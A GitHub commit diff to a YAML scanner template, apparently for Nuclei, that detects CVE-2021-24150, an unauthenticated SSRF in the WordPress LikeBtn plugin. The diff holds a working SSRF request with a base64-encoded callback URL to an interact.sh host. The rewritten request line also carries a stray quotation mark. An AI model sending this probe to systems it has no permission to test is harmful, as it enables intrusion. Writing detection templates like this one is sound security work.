Update CVE-2021-24150.yaml

patch-1
Prince Chaddha 2022-10-07 01:02:42 +05:30 committed by GitHub
parent b38c6bab7e
commit 1bbd536202
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 4 deletions

View File

@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-24150
metadata:
verified: true
tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauthenticated
tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.interact.sh')}}"
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.interact.sh')}}" HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers: